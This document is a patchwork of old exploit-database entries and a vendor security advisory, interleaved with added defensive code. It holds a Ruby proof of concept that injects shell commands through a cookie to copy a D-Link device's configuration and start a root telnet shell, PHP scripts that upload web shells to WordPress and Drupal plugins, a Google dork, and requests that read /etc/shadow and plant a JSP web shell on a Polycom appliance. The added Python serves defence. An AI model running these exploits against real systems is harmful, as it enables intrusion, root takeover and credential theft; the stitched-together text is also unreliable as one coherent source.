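    if ($filename === '' || str_contains($sub, "\0") || str_contains($filename, "\0")) {
        return null;
    }
    // Strip any directory component smuggled in the filename itself.
    $filename = basename($filename);
    // Build the candidate and collapse '.' and '..' lexically, so the check
    // does not depend on the target file already existing on disk.
    $candidate = UPLOAD_BASE . '/' . ltrim($sub, '/') . '/' . $filename;
    $parts = [];
    foreach (explode('/', $candidate) as $seg) {
        if ($seg === '' || $seg === '.') {
            continue;
        }
        if ($seg === '..') {
            array_pop($parts);
            continue;
        }
        $parts[] = $seg;
    }
    $normalized = '/' . implode('/', $parts);
    // After normalization the path must still lie under UPLOAD_BASE.
    if ($normalized !== UPLOAD_BASE && !str_starts_with($normalized, UPLOAD_BASE . '/')) {
        return null;
    }
    return $normalized;
}

// Constructed requests mirroring the page's two cases: 'dev' (which the
// device prefixes) and 'path' alone (which the device does not).
$cases = [
    ['dev' => 'images'],      // /www/images/test.txt
    ['path' => '/etc/'],      // /www/etc/test.txt, never /etc/test.txt
    ['dev' => '../../etc'],   // null: traversal out of /www is rejected
    [],                       // /www/test.txt
];
foreach ($cases as $c) {
    var_dump(resolve_upload_target($c, 'test.txt'));
}
```

The lexical normalization does not follow symlinks inside UPLOAD_BASE; if that directory can contain attacker-created links, resolve the parent with realpath() before the prefix check as well.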
***************
# Upload arbitrary files to the device.
echo 'Some String' > test.txt
curl \
-X POST \
-i \
-F name=@test.txt \
--http1.0 \
'192.168.1.3/web_cgi.cgi?&request=UploadFile&path=/etc/'
========================================
# Exploit Title: D-Link DSP-W Diagnostic Information " Get info"
# Date: 30/06/2015
# Exploit Author: DNO
# Version: w110 v1.05b01
# Tested on: linux
# CVE : N/A
========================================
Severity Level:
===============
High
===============
Patches made to lighttpd by the vendor of this device allow an attacker to
query the device, without authentication, for the following information:
# Current WLAN SSIDs
# Current WLAN channels
# LAN and WAN MAC addressing
# Current firmware version information
# Hardware version information
Although not sensitive information, it may allow identification of
devices running vulnerable firmware versions.
=========================================
# Information query.
curl \
192.168.1.3/mplist.txt
========================================
#ruby poc
----
# DSP-W110-Lighttpd PoC.
require 'pp'
require 'optparse'
require 'restclient'
# Set defaults and parse command line arguments
options = {}
options[:addr] = "192.168.0.60"
options[:port] = 80
OptionParser.new do |option|
option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
options[:addr] = a
end
option.on("--port [PORT]", "Destination TCP port") do |p|
options[:port] = p
end
option.parse!
end
# Define which actions we will be using.
actions = [
{
:name => "Get device information",
:call => "txt_parser",
:path => "mplist.txt",
},
{
:name => "Snatch configuration",
:call => "noop",
:path => "HNAP1",
:cookies => { :cookie => "`cp /etc/co* /www/`" }
},
{
:name => "Fetch configuration",
:call => "conf_writer",
:path => "config.sqlite",
},
{
:name => "Enable telnet (root)",
:call => "noop",
:path => "HNAP1",
:cookies => { :cookie => "`telnetd -l/bin/sh`" }
}
]
def noop(val)
return
end
def txt_parser(txt)
txt.split(/\r?\n/).each do |line|
puts " #{line}"
end
end
def conf_writer(txt)
begin
f = File.open('./config.sqlite', 'wb')
rescue => e
puts "[!] Failed to open config.sqlite for writing #{e.message}"
return # without this, f is nil and the write below raises NoMethodError
end
f.write(txt)
f.close
puts "[*] Configuration fetched into 'config.sqlite'"
end
# Iterate over all actions and attempt to execute.
url = "http://#{options[:addr]}:#{options[:port]}"
puts "[!] Attempting to extract information from #{url}"
actions.each do |action|
# Fire the request and ensure a 200 OKAY.
begin
response = RestClient.get(
"#{url}/#{action[:path]}",
{:cookies => action[:cookies]}
)
rescue
puts "[!] Failed to query remote host."
abort
end
if response.code != 200
puts "[-] '#{action[:name]}' failed with response: #{response.code}"
next
end
# Send to the processor.
puts "[*] #{action[:name]} request succeeded."
send(action[:call], response.body)
end
===================================
contact me FB : FB.COM/haker.dyno
Copyright © 2015 /DNO/
source: https://www.securityfocus.com/bid/54179/info
Drag & Drop Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Drag & Drop Gallery 6.X-1.5 is vulnerable; other versions may also be affected.
<?php
$uploadfile="db.php.gif";
$uploadfile2="lo.php.gif";
$ch = curl_init("http://www.example.com/drupal/sites/all/modules/dragdrop_gallery/upload.php?nid=1&filedir=/drupal/sites/all/modules/dragdrop_gallery/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('user_file[0]'=>"@$uploadfile",
'user_file[1]'=>"@$uploadfile2"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
source: https://www.securityfocus.com/bid/54173/info
Flip Book is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Flip Book 1.0 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################
# Description : Wordpress Plugins - Flip Book Arbitrary File Upload Vulnerability
# Version : 1.0
# link : http://codecanyon.net/item/flip-book-wordpress-plugin/152641
# Price : 30$
# Date : 22-06-2012
# Google Dork : inurl:/wp-content/plugins/flipbook/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/flipbook/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/wordpress/wp-includes/fb-images/lo.php
lo.php
<?php
phpinfo();
?>
# Site : 1337day.com Inj3ct0r Exploit Database
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SEC Consult Vulnerability Lab Security Advisory < 20150626-0 >
=======================================================================
title: Critical vulnerabilities allow surveillance on conferences
product: Polycom RealPresence Resource Manager (RPRM)
vulnerable versions: <8.4
fixed version: 8.4
CVE numbers: CVE-2015-4681, CVE-2015-4682, CVE-2015-4683, CVE-2015-4684
CVE-2015-4685
impact: critical
homepage: http://www.polycom.com
found: 2015-03-10
by: R. Freingruber, C.A. (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
- -------------------
"A key component of the Polycom RealPresence Platform, available as a hardened
appliance or software optimized for virtualized environments, the RealPresence
Resource Manager application is critical to effectively managing thousands of
mobile, desktop, and group telepresence systems."
http://www.polycom.com/content/www/en/products-services/realpresence-platform/management-applications/realpresence-resource-manager.html
Business recommendation:
- ------------------------
By combining all vulnerabilities documented in this advisory an unprivileged
authenticated remote attacker can gain full system access (root) on the RPRM
appliance. This has an impact on all conferences taking place via this RP
Resource Manager. Attackers can steal all conference passcodes and join or
record any conference.
SEC Consult recommends not to use this system until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.
Vulnerability overview/description:
- -----------------------------------
1) Unauthorized plaintext password disclosure of RMX admin accounts
The RPRM discloses the plaintext password of the RMX admin user to an
unauthorized unprivileged attacker by including it in certain HTTP responses.
No manipulation of parameters is required.
2) Arbitrary file disclosure (I) via path traversal (CVE-2015-4684)
Ordinary unprivileged users can download an Excel file of all their upcoming
conferences. This functionality can be exploited by an authenticated attacker
to download arbitrary files from the server due to insufficient input validation.
There is no restriction on which files might be downloaded since this action
is performed with root privileges.
3) Plaintext passwords stored in logfiles
RPRM generates logdata which includes plaintext passwords. This weakness in
combination with the previous vulnerability allows an unprivileged attacker
to escalate his privileges to the admin level in the web interface.
4) Arbitrary file upload via path traversal (CVE-2015-4684)
This vulnerability requires admin privileges in the web interface, but combining
all previous vulnerabilities in this advisory allows privilege escalation.
Administrators can import (upload) "user aliases" in the web interface. This
functionality is vulnerable to a path traversal attack. This vulnerability
can be exploited to upload a webshell and execute arbitrary commands with
the permissions of the system user "plcm".
5) Sudo misconfiguration allows privilege escalation (CVE-2015-4685)
The "plcm" user is allowed to execute certain tools and scripts in given
folders with root privileges. At the same time many of these scripts and
folders are writeable to the plcm user. This allows execution of arbitrary
code with root privileges.
6) Arbitrary file disclosure (II) and removal (path traversal) (CVE-2015-4684)
An authenticated attacker can download and remove any files using this path
traversal vulnerability. Exploitation of this vulnerability requires admin
privileges. There is no restriction on which files might be downloaded or
removed since this action is performed with root privileges.
7) Weak/Missing Authorization
The separation of users relies on the fact that conference IDs are not
guessable, but as soon as an information disclosure vulnerability allows an
attacker to gather conference IDs authorization can be bypassed. The
arbitrary file download vulnerability (2) allows an attacker to collect
valid conference IDs.
8) Absolute path disclosure (CVE-2015-4682)
The web application discloses the absolute path to the web root.
To collect this information no parameter manipulation is required.
The webroot path is valuable when uploading a web shell (see vulnerability 4).
9) Session ID in GET parameter allows for privilege escalation (CVE-2015-4683)
Certain actions on the website (Excel and log file downloads) submit
session IDs in HTTP GET parameters. If a privileged user performs such
an action his session ID is written to the webserver log which can be
retrieved by an unprivileged attacker by exploiting the vulnerability (2).
This results in an additional privilege escalation path. Since session IDs
are bound to source IP addresses, successful exploitation requires the
attacker to have the same source IP as his victim (e.g. NAT).
Proof of concept:
- -----------------
1) Unauthorized plaintext password disclosure of RMX admin accounts
Request:
- -----
POST /PlcmRmWeb/JNetworkDeviceManager?n=... HTTP/1.1
Host: <host>:8443
SOAPAction: http://polycom.com/WebServices/aa:getAvailableBridges
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><aa:getAvailableBridges
xmlns:aa="http://polycom.com/WebServices"><credentials
xsi:type="JCredentials"><userToken>*VALID-USER-TOKEN*</userToken></credentials><resultsForConferenceOwner>false</resultsForConferenceOwner><areaId>-1</areaId></aa:getAvailableBridges></soap:Body></soap:Envelope>
- -----
Response:
- -----
<env:Envelope xmlns:env='http://schemas.xmlsoap.org/soap/envelope/'>
<env:Header></env:Header>
<env:Body>
<ns2:getAvailableBridgesResponse xmlns:ns2="http://polycom.com/WebServices">
<return>
<status>SUCCESS</status>
</return>
<mcuList>
<belongsToAreaUgpId>0</belongsToAreaUgpId>
<defaultAliasName>*redacted*</defaultAliasName>
<description></description>
<deviceId>*redacted*</deviceId>
<deviceName>*redacted*</deviceName>
<deviceStatus>ONLINE</deviceStatus>
<deviceType>CR</deviceType>
<deviceUUID>00000000-0000-0000-0000-000000000000</deviceUUID>
<hasDeviceErrors>false</hasDeviceErrors>
<ipAddress>*redacted*</ipAddress>
<isCallServer>false</isCallServer>
<isMcuPoolOrderSource>false</isMcuPoolOrderSource>
<managedGatekeeperStatus>NOT_APPLICABLE</managedGatekeeperStatus>
<password>*PLAINTEXTPASSWORD*</password>
[...]
- -----
The same information is disclosed in the "aa:getMCUsNetworkDevicesForList" and
"aa:getNetworkDevicesForList" requests.
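The defensive counterpart to this finding is a regression check that parses SOAP responses and fails whenever a credential-bearing element is returned to a client. The following Python is an added example, not part of the SEC Consult advisory or of the Polycom product; the response text is constructed to mirror the shape of the getAvailableBridges reply quoted above, and the element-name list is an assumption to be extended per application.

```python
import xml.etree.ElementTree as ET

# Local (namespace-stripped) element names that must never reach a client.
# Assumption for this example; extend with the application's own field names.
SENSITIVE_LOCAL_NAMES = {"password", "passwd", "secret", "userToken", "sessionId"}

# Constructed sample modelled on the getAvailableBridges response above.
SAMPLE_RESPONSE = """<env:Envelope xmlns:env='http://schemas.xmlsoap.org/soap/envelope/'>
<env:Header></env:Header>
<env:Body>
<ns2:getAvailableBridgesResponse xmlns:ns2="http://polycom.com/WebServices">
<return><status>SUCCESS</status></return>
<mcuList>
<deviceName>bridge-01</deviceName>
<deviceStatus>ONLINE</deviceStatus>
<ipAddress>192.0.2.10</ipAddress>
<password>S3cr3t-example</password>
</mcuList>
</ns2:getAvailableBridgesResponse>
</env:Body>
</env:Envelope>"""


def _local(tag):
    """'{http://ns}password' -> 'password'; namespaces vary, local names do not."""
    return tag.rsplit("}", 1)[-1]


def find_sensitive_elements(xml_text, names=SENSITIVE_LOCAL_NAMES):
    """Return the path of every element whose local name is sensitive and
    which carries a non-empty value. An empty list means the response is clean."""
    root = ET.fromstring(xml_text)
    lowered = {n.lower() for n in names}
    findings = []

    def walk(elem, path):
        here = path + "/" + _local(elem.tag)
        if _local(elem.tag).lower() in lowered and (elem.text or "").strip():
            findings.append(here)
        for child in elem:
            walk(child, here)

    walk(root, "")
    return findings


def redact_sensitive_elements(xml_text, names=SENSITIVE_LOCAL_NAMES, mask="*redacted*"):
    """Return the document with sensitive values masked, e.g. for a response
    filter in a reverse proxy or for safe inclusion in a bug report."""
    root = ET.fromstring(xml_text)
    lowered = {n.lower() for n in names}
    for elem in root.iter():
        if _local(elem.tag).lower() in lowered and (elem.text or "").strip():
            elem.text = mask
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for path in find_sensitive_elements(SAMPLE_RESPONSE):
        print("sensitive value returned at", path)
```

Run find_sensitive_elements over captured responses of the affected SOAP actions (getAvailableBridges, getMCUsNetworkDevicesForList, getNetworkDevicesForList) in a test suite; any non-empty result is a failing test, and redact_sensitive_elements gives a safe version of the evidence.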
2) Arbitrary file disclosure (I) via path traversal
The following URL allows an attacker to read the /etc/shadow file:
https://hostname:8443/PlcmRmWeb/FileDownload?DownloadType=REPORT&Modifier=../../../../../../../etc/shadow&Credentials=*VALID-USER-TOKEN*&ClientId=&FileName=
root:<hash>:16135:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
dbus:!!:16135::::::
hacluster:!!:16135::::::
vcsa:!!:16135::::::
rpc:!!:16135:0:99999:7:::
ntp:!!:16135::::::
plcm:$1$nqk4wqYm$N4QLTb66K8JwE9yM2GuO.1:16135::::::
[...]
(plcm user password is Polycom123)
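Two passages on this page describe the same class of bug: the D-Link upload handler earlier on the page, whose '/www' prefix is only applied when a 'dev' argument is present, and the RPRM FileDownload 'Modifier' parameter here (the same applies to the 'Filename' field in section 4 and 'filePathName' in section 6). The fix in both cases is to canonicalise the client-supplied value against a fixed base directory on every code path, not only when a particular parameter is present. The Python below is an added example, not code from either advisory or vendor; the model of the D-Link logic is an assumption drawn from the prose (the firmware source is not shown), and the REPORT_ROOT directory name is a placeholder.

```python
import posixpath

WWW_ROOT = "/www"  # upload root named in the D-Link advisory
# Placeholder: the real RPRM report directory is not stated on this page.
REPORT_ROOT = "/opt/polycom/cma/current/reports"


def vulnerable_upload_dir(dev, path):
    """Model of the flawed D-Link logic as described in the advisory (an
    assumption about the exact code): 'dev' is prefixed with /www, but when
    'dev' is absent that step is skipped and 'path' is used verbatim."""
    if dev is not None:
        return "/www%s" % dev
    return path


def confine(base, user_path):
    """Return the canonical absolute path of user_path inside base, or None if
    the result would escape base. Pure string canonicalisation: no filesystem
    access, so symlinks already inside base still need separate handling."""
    if user_path is None:
        return None
    # Treat the client value as relative to base whatever it claims to be.
    rel = user_path.replace("\\", "/").lstrip("/")
    if "\x00" in rel:
        return None  # NUL bytes truncate paths in C-based backends
    base_norm = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base_norm, rel))
    if candidate != base_norm and not candidate.startswith(base_norm + "/"):
        return None
    return candidate


def hardened_upload_dir(dev, path):
    """Always confine, regardless of which parameters the client supplied."""
    target = dev if dev is not None else path
    return confine(WWW_ROOT, target)


def resolve_report(modifier):
    """RPRM-style download: the 'Modifier' value may only select a file
    below REPORT_ROOT; '../' sequences and absolute paths are rejected."""
    return confine(REPORT_ROOT, modifier)


if __name__ == "__main__":
    print("vulnerable, no dev:", vulnerable_upload_dir(None, "/etc/"))
    print("hardened, no dev:  ", hardened_upload_dir(None, "/etc/"))
    print("report traversal:  ", resolve_report("../../../../../../../etc/shadow"))
```

The decisive property is that confine() is reached on every request, so the absence of a parameter can never route around it; logging the None results gives a ready-made traversal detection signal.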
3) Plaintext passwords stored in logfiles
No proof of concept necessary.
4) Arbitrary file upload via path traversal
Request:
- -----
POST /PlcmRmWeb/FileUpload HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
User-Agent: Shockwave Flash
Host: <host>:8443
Content-Length: 1076
Connection: Keep-Alive
Cache-Control: no-cache
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="Filename"
../../../../../../../../../../../../opt/polycom/cma/current/jserver/web/ROOT.war/webshell-123.jsp
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="SE_LOC"
null
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="Token"
*VALID-USER-TOKEN*
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="SE_FNAME"
../../../../../../../../../../../../opt/polycom/cma/current/jserver/web/ROOT.war/webshell-123.jsp
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="UploadType"
SIP_URL_CSV
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="FlashSessionId"
*session-id*
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="Filedata"; filename="webshell-123.jsp"
Content-Type: application/octet-stream
*web shell payload here*
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0
Content-Disposition: form-data; name="Upload"
Submit Query
- ------------ae0gL6cH2KM7GI3GI3ae0KM7ae0ae0--
5) Sudo misconfiguration allows privilege escalation
Excerpt from /etc/sudoers:
plcm ALL=(ALL) ALL
plcm ALL=(root)NOPASSWD:/usr/sbin/dmidecode
plcm ALL=(root)NOPASSWD:/sbin/init
plcm ALL=(root)NOPASSWD:/sbin/service
plcm ALL=(root)NOPASSWD:/opt/polycom/cma/*/jserver/bin/getNetworkInfo.pl
*...*
plcm ALL=(root)NOPASSWD:/opt/polycom/cma/*/jserver/schema/script/getCipherSuiteMode.sh
plcm ALL=(root)NOPASSWD:/opt/polycom/cma/*/ha/scripts/*
*...*
plcm ALL=(root)NOPASSWD:/var/polycom/cma/upgrade/scripts/*
plcm ALL=(root)NOPASSWD:/usr/bin/snmptrap
plcm ALL=(root)NOPASSWD:/usr/bin/snmpget
plcm ALL=(root)NOPASSWD:/sbin/iptables
*...*
plcm ALL=(root)NOPASSWD:/usr/sbin/tcpdump
plcm ALL=(root)NOPASSWD:/usr/sbin/logrotate
plcm ALL=(root)NOPASSWD:/usr/sbin/wired_supplicant_configurator
Among many other paths in this long list, the folder
/var/polycom/cma/upgrade/scripts/
is writeable for the plcm user. Simply placing any malicious script/executable in
this folder and executing it via sudo gives an attacker full root access.
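A sudoers audit that flags exactly the patterns named here (blanket 'ALL', wildcards in command paths, and NOPASSWD commands located in directories the user can write) is a quick way to find this misconfiguration on any appliance. The Python below is an added example, not part of the SEC Consult advisory; the sudoers excerpt is a constructed sample modelled on the lines quoted above, the writable-directory set is constructed (on a real host it would come from a writability scan run as the audited account), and the parser handles only the simple rule form, not aliases or Defaults lines.

```python
import posixpath
import re

# Constructed excerpt modelled on the /etc/sudoers lines quoted in the advisory.
SUDOERS_EXCERPT = """\
plcm ALL=(ALL) ALL
plcm ALL=(root)NOPASSWD:/usr/sbin/dmidecode
plcm ALL=(root)NOPASSWD:/sbin/service
plcm ALL=(root)NOPASSWD:/opt/polycom/cma/*/jserver/bin/getNetworkInfo.pl
plcm ALL=(root)NOPASSWD:/var/polycom/cma/upgrade/scripts/*
plcm ALL=(root)NOPASSWD:/usr/sbin/tcpdump
"""

# Directories the audited account can write to. Constructed for the example;
# on a real host run a writability scan as that account to build this set.
WRITABLE_BY_PLCM = {"/var/polycom/cma/upgrade/scripts"}

# user host=(runas) [TAG:...] command[, command...]  -- simplified grammar:
# no aliases, no Defaults lines, no line continuations.
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>[^=\s]+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def _writable_ancestor(path, writable_dirs):
    """First directory at or above the command's directory that the user can write."""
    d = posixpath.dirname(path)
    while d and d != "/":
        if d in writable_dirs:
            return d
        d = posixpath.dirname(d)
    return None


def audit_sudoers(text, writable_dirs):
    """Return one finding per rule/command that amounts to unrestricted root:
    'ALL', a wildcard in the command path, or a command in a writable directory."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            binary = cmd.split()[0]
            issues = []
            if binary == "ALL":
                # Even with a password prompt, 'ALL' is full root for anyone
                # who knows the account's password.
                issues.append("ALL: any command may be run as root")
            else:
                if "*" in binary:
                    issues.append("wildcard in command path: the user picks the executable")
                w = _writable_ancestor(binary, writable_dirs)
                if w:
                    issues.append("writable directory %s: the user can replace the executable" % w)
            for issue in issues:
                findings.append({"line": lineno, "user": m.group("user"), "command": cmd,
                                 "nopasswd": nopasswd, "issue": issue})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SUDOERS_EXCERPT, WRITABLE_BY_PLCM):
        print("line %(line)d %(user)s %(command)s: %(issue)s" % f)
```

The /var/polycom/cma/upgrade/scripts/* rule produces two findings at once (wildcard and writable directory), which is the combination the advisory describes; remediation is to enumerate exact script paths, make them root-owned and non-writable, and drop the 'ALL' rule.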
6) Arbitrary file disclosure (II) and removal (path traversal)
The following request is used to disclose and remove "/etc/hosts" from the system.
An arbitrary file can be specified here (operations are executed with root privileges).
POST /PlcmRmWeb/JUserManager?n=... HTTP/1.1
Host: <host>:8443
SOAPAction: http://polycom.com/WebServices/aa:importSipUriReservations
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><aa:importSipUriReservations
xmlns:aa="http://polycom.com/WebServices"><credentials
xsi:type="JCredentials"><userToken>*VALID-USER-TOKEN*</userToken></credentials><filePathName>../../../../../../../../../../../../../etc/hosts</filePathName></aa:importSipUriReservations></soap:Body></soap:Envelope>
It's very likely that the SOAP action "aa:importUserH323Reservations" contains the same vulnerability.
7) Weak/Missing Authorization
The exploit of this vulnerability has been removed from this advisory.
According to the vendor it is unresolved in the new software version 8.4.
8) Absolute path disclosure
Request:
- -----
POST /PlcmRmWeb/JConfigManager?n=... HTTP/1.1
Host: <host>:8443
SOAPAction: http://polycom.com/WebServices/aa:getCustomLogoUploadPath
Content-Length: 417
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><aa:getCustomLogoUploadPath
xmlns:aa="http://polycom.com/WebServices"><credentials
xsi:type="JCredentials"><userToken>*VALID-USER-TOKEN*</userToken></credentials></aa:getCustomLogoUploadPath></soap:Body></soap:Envelope>
- -----
Response:
- ---------
<env:Envelope xmlns:env='http://schemas.xmlsoap.org/soap/envelope/'>
<env:Header></env:Header>
<env:Body>
<ns2:getCustomLogoUploadPathResponse xmlns:ns2="http://polycom.com/WebServices">
<return>
<status>SUCCESS</status>
</return>
<url>/download/CustomLogos/</url>
<path>/opt/polycom/cma/current/jserver/web/ROOT.war/download/CustomLogos/</path>
</ns2:getCustomLogoUploadPathResponse>
</env:Body>
</env:Envelope>
- -----
At least the following SOAP actions can be used to retrieve absolute paths:
- - aa:getCustomLogoUploadPath
- - aa:getCustomDesktopLogoUploadPath
- - aa:getUploadDirectory
- - aa:getSystemLogFiles
- - aa:getLegacyUploadDir
- - aa:getAuditLogFiles
9) Session ID in GET parameter allows privilege escalation
Sample URL that contains a session ID in the GET parameter 'Credential':
/PlcmRmWeb/FileDownload?DownloadType=LOGGER&Modifier=-123&Credentials=12345678-1234-1234-1234-123456789000&ClientId=&FileName=Conference.log
Path to the webserver access logfiles:
/var/log/polycom/cma/audit/localhost_access_log.log
/var/log/polycom/cma/audit/localhost_access_log.log.1.gz
...
Extract valid session IDs from the log files:
egrep "[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" localhost_access_log.log
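For a defender the same observation works as a detection: any session-like token appearing in the query string of an access log is a leaked credential that needs to be revoked, and the application change is to move it into a header or POST body. The Python below is an added example, not part of the SEC Consult advisory; it parses common-log-format lines (constructed sample, patterned on the FileDownload URL above), reports each request that carries a UUID-shaped value or a known credential parameter, and masks the tokens so the report does not re-leak them. The parameter-name list is an assumption to extend per application.

```python
import re
from urllib.parse import parse_qs, urlsplit

UUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Query parameters known to carry credentials: 'Credentials' comes from the
# advisory, the rest are common names (assumption; extend per application).
TOKEN_PARAMS = {"credentials", "token", "sessionid", "jsessionid"}

# Common log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) '
    r'(?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines modelled on the FileDownload URL quoted above.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Jun/2015:10:01:02 +0200] "GET /PlcmRmWeb/FileDownload?DownloadType=LOGGER&Modifier=-123&Credentials=12345678-1234-1234-1234-123456789000&ClientId=&FileName=Conference.log HTTP/1.1" 200 5120
10.0.0.7 - - [26/Jun/2015:10:01:09 +0200] "POST /PlcmRmWeb/JUserManager?n=1 HTTP/1.1" 200 310
10.0.0.5 - - [26/Jun/2015:10:02:44 +0200] "GET /PlcmRmWeb/FileDownload?DownloadType=REPORT&Modifier=1&Credentials=12345678-1234-1234-1234-123456789000&ClientId=&FileName= HTTP/1.1" 200 9001
"""


def mask_token(tok):
    """Keep enough of the token to correlate occurrences, never the whole value."""
    if UUID_RE.fullmatch(tok):
        return tok[:8] + "-****-****-****-" + tok[-4:]
    return tok[:4] + "*" * max(4, len(tok) - 4)


def find_leaked_tokens(log_text):
    """One record per (request, parameter) whose query string carries a
    session-like token; the token is stored masked."""
    records = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        if not query:
            continue
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                if value and (name.lower() in TOKEN_PARAMS or UUID_RE.fullmatch(value)):
                    records.append({"line": lineno, "ip": m.group("ip"), "time": m.group("ts"),
                                    "path": urlsplit(m.group("target")).path,
                                    "param": name, "token": mask_token(value)})
    return records


def summarize(records):
    """Distinct (masked token, client IP) pairs: each is one session to revoke."""
    return {(r["token"], r["ip"]) for r in records}


if __name__ == "__main__":
    recs = find_leaked_tokens(SAMPLE_LOG)
    for r in recs:
        print("line %(line)d %(ip)s %(path)s %(param)s=%(token)s" % r)
    print("sessions to revoke:", len(summarize(recs)))
```

Because RPRM writes these logs to a root-readable location that vulnerability (2) exposes, a non-empty result here is also the list of sessions that must be invalidated after patching, not merely a hygiene finding.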
Vulnerable versions:
- -----------------------------
According to the vendor, all software versions <8.4 are affected.
Vendor contact timeline:
- ------------------------
2015-03-25: Video conference with Polycom, discussing vulnerabilities
2015-03-27: Contacting Polycom through security@polycom.com, requesting
encryption keys, attaching responsible disclosure policy.
2015-04-01: Polycom provides PGP key
2015-04-02: Sending encrypted security advisory to Polycom
2015-04-03: Polycom provides affected versions
2015-04-29: Polycom provides planned release date (2015-06-19) and
version number that fixes issues.
2015-05-06: SEC Consult confirms advisory release date: 2015-06-26
2015-06-15: Polycom releases RPRM v8.4
2015-06-18: Polycom provides URL to RPRM v8.4
